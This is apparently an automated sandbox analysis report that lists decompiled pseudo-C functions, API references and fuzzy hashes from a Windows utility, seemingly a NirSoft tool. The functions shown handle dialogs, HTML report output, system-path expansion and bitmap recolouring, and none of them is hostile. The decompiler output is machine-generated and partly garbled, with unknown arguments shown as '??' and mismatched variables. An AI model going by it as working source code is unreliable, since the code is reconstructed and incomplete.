                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                                    • String ID: A
                                                                                                                                                                    • API String ID: 2892645895-3554254475
                                                                                                                                                                    • Opcode ID: 885c7b7efeaa64dd561d1061219ec06417023ed24bc0a52f7ba4a118946187d8
                                                                                                                                                                    • Instruction ID: 0871a1714dd068d8f738543c02bb6dd68063c1354b3792716d758cdabfe2902c
                                                                                                                                                                    • Opcode Fuzzy Hash: 885c7b7efeaa64dd561d1061219ec06417023ed24bc0a52f7ba4a118946187d8
                                                                                                                                                                    • Instruction Fuzzy Hash: 2B315DB1650608BFEB205F60CC86E9ABAADFB04745F00803AF305754E0C7B69E90DA98
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 56%
                                                                                                                                                                    			E0040D7CE(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
                                                                                                                                                                    				void _v514;
                                                                                                                                                                    				char _v516;
                                                                                                                                                                    				void _v1026;
                                                                                                                                                                    				char _v1028;
                                                                                                                                                                    				void _v1538;
                                                                                                                                                                    				char _v1540;
                                                                                                                                                                    				void* _t39;
                                                                                                                                                                    				intOrPtr* _t50;
                                                                                                                                                                    				void* _t61;
                                                                                                                                                                    
                                                                                                                                                                    				_t50 = __ecx;
                                                                                                                                                                    				_push(0x1fe);
                                                                                                                                                                    				_push(0);
                                                                                                                                                                    				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                                                                                                                                                                    					_v1540 = 0;
                                                                                                                                                                    					memset( &_v1538, ??, ??);
                                                                                                                                                                    					_v1028 = 0;
                                                                                                                                                                    					memset( &_v1026, 0, 0x1fe);
                                                                                                                                                                    					_v516 = 0;
                                                                                                                                                                    					memset( &_v514, 0, 0x1fe);
                                                                                                                                                                    					L0040DFD6();
                                                                                                                                                                    					 *((long long*)(_t61 + 0x2c)) = _a16;
                                                                                                                                                                    					L0040DFD6();
                                                                                                                                                                    					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
                                                                                                                                                                    					if (_t39 != 0) goto L3;
                                                                                                                                                                    					return _t39;
                                                                                                                                                                    				}
                                                                                                                                                                    				_v516 = 0;
                                                                                                                                                                    				memset( &_v514, ??, ??);
                                                                                                                                                                    				_v1028 = 0;
                                                                                                                                                                    				memset( &_v1026, 0, 0x1fe);
                                                                                                                                                                    				L0040DFD6();
                                                                                                                                                                    				 *((long long*)(_t61 + 0x20)) =  *_a12;
                                                                                                                                                                    				L0040DFD6();
                                                                                                                                                                    				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40f454, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
                                                                                                                                                                    			}













                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memset$_snwprintf
                                                                                                                                                                    • String ID: %%0.%df
                                                                                                                                                                    • API String ID: 3473751417-763548558
                                                                                                                                                                    • Opcode ID: 860c56ee3740ab7c76ae19f9702a4c2ad5aeadb2154bffe7709fa0f8ec1fc05c
                                                                                                                                                                    • Instruction ID: bd80c20c5eef5304b465cefa7c525b6dc43605deb3d47911a7a30c53393811c5
                                                                                                                                                                    • Opcode Fuzzy Hash: 860c56ee3740ab7c76ae19f9702a4c2ad5aeadb2154bffe7709fa0f8ec1fc05c
                                                                                                                                                                    • Instruction Fuzzy Hash: 9F315E71900129AADB20DF95CC85FEB777CFF48304F0044FAB50AB6152E7749A588B69
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 51%
                                                                                                                                                                    			E00407047(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
                                                                                                                                                                    				void _v8202;
                                                                                                                                                                    				short _v8204;
                                                                                                                                                                    				void* _t27;
                                                                                                                                                                    				short _t29;
                                                                                                                                                                    				short _t40;
                                                                                                                                                                    				void* _t41;
                                                                                                                                                                    				struct HMENU__* _t43;
                                                                                                                                                                    				short _t50;
                                                                                                                                                                    				void* _t52;
                                                                                                                                                                    				struct HMENU__* _t59;
                                                                                                                                                                    
                                                                                                                                                                    				E0040E340(0x2008, __ecx);
                                                                                                                                                                    				_t65 = _a8 - 4;
                                                                                                                                                                    				if(_a8 != 4) {
                                                                                                                                                                    					__eflags = _a8 - 5;
                                                                                                                                                                    					if(_a8 == 5) {
                                                                                                                                                                    						_t50 =  *0x4131d0; // 0x0
                                                                                                                                                                    						__eflags = _t50;
                                                                                                                                                                    						if(_t50 == 0) {
                                                                                                                                                                    							L8:
                                                                                                                                                                    							_push(_a12);
                                                                                                                                                                    							_t27 = 5;
                                                                                                                                                                    							E00406CC6(_t27);
                                                                                                                                                                    							_t29 = CreateDialogParamW(_a4, _a12, 0, E00407042, 0);
                                                                                                                                                                    							__eflags = _t29;
                                                                                                                                                                    							_a8 = _t29;
                                                                                                                                                                    							if(_t29 == 0) {
                                                                                                                                                                    								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00407042, 0);
                                                                                                                                                                    							}
                                                                                                                                                                    							_v8204 = 0;
                                                                                                                                                                    							memset( &_v8202, 0, 0x2000);
                                                                                                                                                                    							GetWindowTextW(_a8,  &_v8204, 0x1000);
                                                                                                                                                                    							__eflags = _v8204;
                                                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                                                    								E00406DE5(__eflags, L"caption",  &_v8204, 0);
                                                                                                                                                                    							}
                                                                                                                                                                    							EnumChildWindows(_a8, E00406F88, 0);
                                                                                                                                                                    							DestroyWindow(_a8);
                                                                                                                                                                    						} else {
                                                                                                                                                                    							while(1) {
                                                                                                                                                                    								_t40 =  *_t50;
                                                                                                                                                                    								__eflags = _t40;
                                                                                                                                                                    								if(_t40 == 0) {
                                                                                                                                                                    									goto L8;
                                                                                                                                                                    								}
                                                                                                                                                                    								__eflags = _t40 - _a12;
                                                                                                                                                                    								if(_t40 != _a12) {
                                                                                                                                                                    									_t50 = _t50 + 4;
                                                                                                                                                                    									__eflags = _t50;
                                                                                                                                                                    									continue;
                                                                                                                                                                    								}
                                                                                                                                                                    								goto L13;
                                                                                                                                                                    							}
                                                                                                                                                                    							goto L8;
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    				} else {
                                                                                                                                                                    					_push(_a12);
                                                                                                                                                                    					_t41 = 4;
                                                                                                                                                                    					E00406CC6(_t41);
                                                                                                                                                                    					_pop(_t52);
                                                                                                                                                                    					_t43 = LoadMenuW(_a4, _a12);
                                                                                                                                                                    					 *0x412c34 =  *0x412c34 & 0x00000000;
                                                                                                                                                                    					_t59 = _t43;
                                                                                                                                                                    					_push(1);
                                                                                                                                                                    					_push(_t59);
                                                                                                                                                                    					_push(_a12);
                                                                                                                                                                    					E00406E97(_t52, _t65);
                                                                                                                                                                    					DestroyMenu(_t59);
                                                                                                                                                                    				}
                                                                                                                                                                    				L13:
                                                                                                                                                                    				return 1;
                                                                                                                                                                    			}














                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadMenuW.USER32 ref: 0040706F
                                                                                                                                                                      • Part of subcall function 00406E97: GetMenuItemCount.USER32 ref: 00406EAD
                                                                                                                                                                      • Part of subcall function 00406E97: memset.MSVCRT ref: 00406ECC
                                                                                                                                                                      • Part of subcall function 00406E97: GetMenuItemInfoW.USER32 ref: 00406F08
                                                                                                                                                                      • Part of subcall function 00406E97: wcschr.MSVCRT ref: 00406F20
                                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 0040708D
                                                                                                                                                                    • CreateDialogParamW.USER32 ref: 004070E2
                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 004070ED
                                                                                                                                                                    • CreateDialogParamW.USER32 ref: 004070FA
                                                                                                                                                                    • memset.MSVCRT ref: 00407113
                                                                                                                                                                    • GetWindowTextW.USER32 ref: 0040712A
                                                                                                                                                                    • EnumChildWindows.USER32 ref: 00407157
                                                                                                                                                                    • DestroyWindow.USER32(00000005), ref: 00407160
                                                                                                                                                                      • Part of subcall function 00406CC6: _snwprintf.MSVCRT ref: 00406CEB
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                                    • String ID: caption
                                                                                                                                                                    • API String ID: 973020956-4135340389
                                                                                                                                                                    • Opcode ID: cadb9d31fe5310bdce87adbc6d0a26ae13e87b491cdbe26e05780d9e60c23650
                                                                                                                                                                    • Instruction ID: 143ff9b161303c46051d95ab40737f9cae21d75e3476d01ba51655d965e5fbc2
                                                                                                                                                                    • Opcode Fuzzy Hash: cadb9d31fe5310bdce87adbc6d0a26ae13e87b491cdbe26e05780d9e60c23650
                                                                                                                                                                    • Instruction Fuzzy Hash: 1131B472504208BFEF219F60DC85EAB3B69FB00314F10847AF909A6191D7759D64CB56
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 65%
                                                                                                                                                                    			E00409D04(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                    				void _v2050;
                                                                                                                                                                    				char _v2052;
                                                                                                                                                                    				void _v4098;
                                                                                                                                                                    				long _v4100;
                                                                                                                                                                    				void _v6146;
                                                                                                                                                                    				char _v6148;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				void* _t43;
                                                                                                                                                                    				intOrPtr* _t49;
                                                                                                                                                                    				intOrPtr* _t57;
                                                                                                                                                                    				void* _t58;
                                                                                                                                                                    				void* _t59;
                                                                                                                                                                    				intOrPtr _t62;
                                                                                                                                                                    				intOrPtr _t63;
                                                                                                                                                                    
                                                                                                                                                                    				_t49 = __ecx;
                                                                                                                                                                    				E0040E340(0x1800, __ecx);
                                                                                                                                                                    				_t57 = _t49;
                                                                                                                                                                    				E00408857(_t57, _t49, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
                                                                                                                                                                    				_v4100 = 0;
                                                                                                                                                                    				memset( &_v4098, 0, 0x7fe);
                                                                                                                                                                    				_v2052 = 0;
                                                                                                                                                                    				memset( &_v2050, 0, 0x7fe);
                                                                                                                                                                    				_v6148 = 0;
                                                                                                                                                                    				memset( &_v6146, 0, 0x7fe);
                                                                                                                                                                    				_t59 = _t58 + 0x24;
                                                                                                                                                                    				_t62 =  *0x412ed0; // 0x0
                                                                                                                                                                    				if(_t62 != 0) {
                                                                                                                                                                    					_push(0x412ed0);
                                                                                                                                                                    					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
                                                                                                                                                                    					_push(0x400);
                                                                                                                                                                    					_push( &_v2052);
                                                                                                                                                                    					L0040DFD6();
                                                                                                                                                                    					_t59 = _t59 + 0x10;
                                                                                                                                                                    				}
                                                                                                                                                                    				_t63 =  *0x412ecc; // 0x0
                                                                                                                                                                    				if(_t63 != 0) {
                                                                                                                                                                    					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
                                                                                                                                                                    				}
                                                                                                                                                                    				E00409130(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
                                                                                                                                                                    				_push( *((intOrPtr*)( *_t57 + 0x94))( *((intOrPtr*)( *_t57 + 0x90))()));
                                                                                                                                                                    				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
                                                                                                                                                                    				_push(0x400);
                                                                                                                                                                    				_push( &_v6148);
                                                                                                                                                                    				L0040DFD6();
                                                                                                                                                                    				_t43 = E00408857(_t57, _t57, _a4,  &_v6148);
                                                                                                                                                                    				_t64 = _a8 - 5;
                                                                                                                                                                    				if(_a8 == 5) {
                                                                                                                                                                    					return E00409336(_t57, _t64, _a4);
                                                                                                                                                                    				}
                                                                                                                                                                    				return _t43;
                                                                                                                                                                    			}


















                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    • <table dir="rtl"><tr><td>, xrefs: 00409DA4
                                                                                                                                                                    • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00409D14
                                                                                                                                                                    • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00409DE6
                                                                                                                                                                    • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00409D81
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                    • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                    • API String ID: 1283228442-2366825230
                                                                                                                                                                    • Opcode ID: d8f9f2fa32ef8c2b6d7c2e6d24b479b72ee30a36092e5f9a2670ad64564f4937
                                                                                                                                                                    • Instruction ID: a7c5b093c416f5d9ad8a61283befa58304fd8337d6ea87f6454d28f796e895fe
                                                                                                                                                                    • Opcode Fuzzy Hash: d8f9f2fa32ef8c2b6d7c2e6d24b479b72ee30a36092e5f9a2670ad64564f4937
                                                                                                                                                                    • Instruction Fuzzy Hash: 37219172A001186ACB21AB95CC41FEA37BCFF4C345F0440BEF549E3181DB789E948B69
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                                    			E0040CAF2(wchar_t* __edi, wchar_t* __esi) {
                                                                                                                                                                    				void _v526;
                                                                                                                                                                    				long _v528;
                                                                                                                                                                    				wchar_t* _t17;
                                                                                                                                                                    				signed int _t40;
                                                                                                                                                                    				wchar_t* _t50;
                                                                                                                                                                    
                                                                                                                                                                    				_t50 = __edi;
                                                                                                                                                                    				if(__esi[0] != 0x3a) {
                                                                                                                                                                    					_t17 = wcschr( &(__esi[1]), 0x3a);
                                                                                                                                                                    					if(_t17 == 0) {
                                                                                                                                                                    						_t40 = E0040546C(__esi, L"\\systemroot");
                                                                                                                                                                    						if(_t40 < 0) {
                                                                                                                                                                    							if( *__esi != 0x5c) {
                                                                                                                                                                    								wcscpy(__edi, __esi);
                                                                                                                                                                    							} else {
                                                                                                                                                                    								_v528 = 0;
                                                                                                                                                                    								memset( &_v526, 0, 0x208);
                                                                                                                                                                    								E004059AA( &_v528);
                                                                                                                                                                    								memcpy(__edi,  &_v528, 4);
                                                                                                                                                                    								__edi[1] = __edi[1] & 0x00000000;
                                                                                                                                                                    								wcscat(__edi, __esi);
                                                                                                                                                                    							}
                                                                                                                                                                    						} else {
                                                                                                                                                                    							_v528 = 0;
                                                                                                                                                                    							memset( &_v526, 0, 0x208);
                                                                                                                                                                    							E004059AA( &_v528);
                                                                                                                                                                    							wcscpy(__edi,  &_v528);
                                                                                                                                                                    							wcscat(__edi, __esi + 0x16 + _t40 * 2);
                                                                                                                                                                    						}
                                                                                                                                                                    						L11:
                                                                                                                                                                    						return _t50;
                                                                                                                                                                    					}
                                                                                                                                                                    					_push( &(_t17[0]));
                                                                                                                                                                    					L4:
                                                                                                                                                                    					wcscpy(_t50, ??);
                                                                                                                                                                    					goto L11;
                                                                                                                                                                    				}
                                                                                                                                                                    				_push(__esi);
                                                                                                                                                                    				goto L4;
                                                                                                                                                                    			}









                                                                                                                                                                    APIs
                                                                                                                                                                    • wcschr.MSVCRT ref: 0040CB0B
                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040CB1B
                                                                                                                                                                      • Part of subcall function 0040546C: wcslen.MSVCRT ref: 0040547B
                                                                                                                                                                      • Part of subcall function 0040546C: wcslen.MSVCRT ref: 00405485
                                                                                                                                                                      • Part of subcall function 0040546C: _memicmp.MSVCRT ref: 004054A0
                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040CB6A
                                                                                                                                                                    • wcscat.MSVCRT ref: 0040CB75
                                                                                                                                                                    • memset.MSVCRT ref: 0040CB51
                                                                                                                                                                      • Part of subcall function 004059AA: GetWindowsDirectoryW.KERNEL32(004132D0,00000104,?,0040CBAA,?,?,00000000,00000208,00000000), ref: 004059C0
                                                                                                                                                                      • Part of subcall function 004059AA: wcscpy.MSVCRT ref: 004059D0
                                                                                                                                                                    • memset.MSVCRT ref: 0040CB99
                                                                                                                                                                    • memcpy.MSVCRT ref: 0040CBB4
                                                                                                                                                                    • wcscat.MSVCRT ref: 0040CBC0
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                    • String ID: \systemroot
                                                                                                                                                                    • API String ID: 4173585201-1821301763
                                                                                                                                                                    • Opcode ID: 197ef35b965182a27a0b5126cdc1684e529fecbe610c523fb1bd77083df9de9f
                                                                                                                                                                    • Instruction ID: 3f83ceb5217c301b0de1b10fb1ff833d5e9f5f4e9ae752904631e86f644bb4d0
                                                                                                                                                                    • Opcode Fuzzy Hash: 197ef35b965182a27a0b5126cdc1684e529fecbe610c523fb1bd77083df9de9f
                                                                                                                                                                    • Instruction Fuzzy Hash: F821F8B2404314A9D621A7629C87EAB73FC9F04314F20467FB415F20C2FA7C75448B6E
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                                    			E00402DE1(void* __fp0) {
                                                                                                                                                                    				void* _v24;
                                                                                                                                                                    				void _v28;
                                                                                                                                                                    				void* _v56;
                                                                                                                                                                    				intOrPtr _v60;
                                                                                                                                                                    				void* _v64;
                                                                                                                                                                    				void* _v72;
                                                                                                                                                                    				void* _v76;
                                                                                                                                                                    				intOrPtr _v84;
                                                                                                                                                                    				long _v88;
                                                                                                                                                                    				intOrPtr _v92;
                                                                                                                                                                    				int _v96;
                                                                                                                                                                    				int _v100;
                                                                                                                                                                    				intOrPtr _v104;
                                                                                                                                                                    				int _v108;
                                                                                                                                                                    				int _v112;
                                                                                                                                                                    				intOrPtr _v128;
                                                                                                                                                                    				unsigned int _t51;
                                                                                                                                                                    				signed char _t52;
                                                                                                                                                                    				intOrPtr _t53;
                                                                                                                                                                    				intOrPtr _t64;
                                                                                                                                                                    				struct HDC__* _t75;
                                                                                                                                                                    
                                                                                                                                                                    				_v56 = LoadImageW(GetModuleHandleW(0), 0x6e, 0, 0, 0, 0x1060);
                                                                                                                                                                    				_v28 = 0;
                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                    				GetObjectW(_v56, 0x18,  &_v28);
                                                                                                                                                                    				_t75 = CreateCompatibleDC(0);
                                                                                                                                                                    				_v64 = SelectObject(_t75, _v72);
                                                                                                                                                                    				_v72 = GetSysColor(0xf);
                                                                                                                                                                    				_v88 = GetPixel(_t75, 0, 0);
                                                                                                                                                                    				_v96 = 0;
                                                                                                                                                                    				if(_v56 > 0) {
                                                                                                                                                                    					do {
                                                                                                                                                                    						_v100 = 0;
                                                                                                                                                                    						if(_v60 > 0) {
                                                                                                                                                                    							do {
                                                                                                                                                                    								_t51 = GetPixel(_t75, _v100, _v96);
                                                                                                                                                                    								if(_t51 != _v100) {
                                                                                                                                                                    									_t52 = _t51 & 0x000000ff;
                                                                                                                                                                    									_v92 = (_t51 & 0x000000ff) + (_t51 >> 0x00000010 & 0x000000ff) + _t52;
                                                                                                                                                                    									asm("fild dword [esp+0x20]");
                                                                                                                                                                    									asm("fistp qword [esp+0x28]");
                                                                                                                                                                    									_t64 = _v84;
                                                                                                                                                                    									_v92 = _t64;
                                                                                                                                                                    									asm("fisub dword [esp+0x20]");
                                                                                                                                                                    									asm("fldz");
                                                                                                                                                                    									asm("fcomp st0, st1");
                                                                                                                                                                    									asm("fnstsw ax");
                                                                                                                                                                    									if((_t52 & 0x00000041) == 0) {
                                                                                                                                                                    										asm("fchs");
                                                                                                                                                                    									}
                                                                                                                                                                    									asm("fcomp qword [0x410b70]");
                                                                                                                                                                    									asm("fnstsw ax");
                                                                                                                                                                    									_t53 = _t64 + 1;
                                                                                                                                                                    									if((_t52 & 0x00000001) != 0) {
                                                                                                                                                                    										_t53 = _t64;
                                                                                                                                                                    									}
                                                                                                                                                                    									_push(((_t53 + 0x00000080 & 0x000000ff) << 0x00000008 | _t53 + 0x00000080 & 0x000000ff) << 0x00000008 | _t53 + 0x00000080 & 0x000000ff);
                                                                                                                                                                    								} else {
                                                                                                                                                                    									_push(_v96);
                                                                                                                                                                    								}
                                                                                                                                                                    								SetPixel(_t75, _v112, _v108, ??);
                                                                                                                                                                    								_v128 = _v128 + 1;
                                                                                                                                                                    							} while (_v128 < _v88);
                                                                                                                                                                    						}
                                                                                                                                                                    						_v96 = _v96 + 1;
                                                                                                                                                                    					} while (_v96 < _v56);
                                                                                                                                                                    				}
                                                                                                                                                                    				SelectObject(_t75, _v76);
                                                                                                                                                                    				DeleteDC(_t75);
                                                                                                                                                                    				return _v104;
                                                                                                                                                                    			}

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,0000006E,00000000,00000000,00000000,00001060), ref: 00402DFA
                                                                                                                                                                    • LoadImageW.USER32 ref: 00402E01
                                                                                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00402E25
                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00402E2C
                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00402E39
                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00402E45
                                                                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00402E58
                                                                                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 00402E83
                                                                                                                                                                    • SetPixel.GDI32(00000000,?,?,?), ref: 00402F00
                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00402F2F
                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 00402F36
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ObjectPixel$Select$ColorCompatibleCreateDeleteHandleImageLoadModule
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2468767547-0
                                                                                                                                                                    • Opcode ID: 7033ca8cb5081ea6992c12c0c258a27d757a0da9ef6fc35bb73742e8d51b50bd
                                                                                                                                                                    • Instruction ID: 6edf35894f1bf038c9276b60c95336d8acf92c36c4475dd3a027cf99260808bc
                                                                                                                                                                    • Opcode Fuzzy Hash: 7033ca8cb5081ea6992c12c0c258a27d757a0da9ef6fc35bb73742e8d51b50bd
                                                                                                                                                                    • Instruction Fuzzy Hash: B9419A71508311ABC7109F60DA4896FBBF8FBC9B51F00493EF585A2291C7789448DBA6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                    			E00405F82() {
                                                                                                                                                                    				int _v8;
                                                                                                                                                                    				int _v12;
                                                                                                                                                                    				void* _v16;
                                                                                                                                                                    				long _v20;
                                                                                                                                                                    				long _v24;
                                                                                                                                                                    				void* _v28;
                                                                                                                                                                    				intOrPtr _v44;
                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                    				void _v52;
                                                                                                                                                                    				struct HDC__* _t46;
                                                                                                                                                                    
                                                                                                                                                                    				_v16 = LoadImageW(GetModuleHandleW(0), 0x6e, 0, 0, 0, 0x1060);
                                                                                                                                                                    				_v52 = 0;
                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                    				GetObjectW(_v16, 0x18,  &_v52);
                                                                                                                                                                    				_t46 = CreateCompatibleDC(0);
                                                                                                                                                                    				_v28 = SelectObject(_t46, _v16);
                                                                                                                                                                    				_v24 = GetSysColor(0xf);
                                                                                                                                                                    				_v20 = GetPixel(_t46, 0, 0);
                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                    				if(_v44 > 0) {
                                                                                                                                                                    					do {
                                                                                                                                                                    						_v8 = 0;
                                                                                                                                                                    						if(_v48 > 0) {
                                                                                                                                                                    							do {
                                                                                                                                                                    								if(GetPixel(_t46, _v8, _v12) == _v20) {
                                                                                                                                                                    									SetPixel(_t46, _v8, _v12, _v24);
                                                                                                                                                                    								}
                                                                                                                                                                    								_v8 = _v8 + 1;
                                                                                                                                                                    							} while (_v8 < _v48);
                                                                                                                                                                    						}
                                                                                                                                                                    						_v12 = _v12 + 1;
                                                                                                                                                                    					} while (_v12 < _v44);
                                                                                                                                                                    				}
                                                                                                                                                                    				SelectObject(_t46, _v28);
                                                                                                                                                                    				DeleteDC(_t46);
                                                                                                                                                                    				return _v16;
                                                                                                                                                                    			}














                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00405F8E
                                                                                                                                                                    • LoadImageW.USER32 ref: 00405F9F
                                                                                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00405FBE
                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00405FC5
                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00405FD1
                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00405FDC
                                                                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00405FEE
                                                                                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0040600A
                                                                                                                                                                    • SetPixel.GDI32(00000000,?,?,?), ref: 0040601B
                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 0040603B
                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 00406042
                                                                                                                                                                    Memory Dump Source
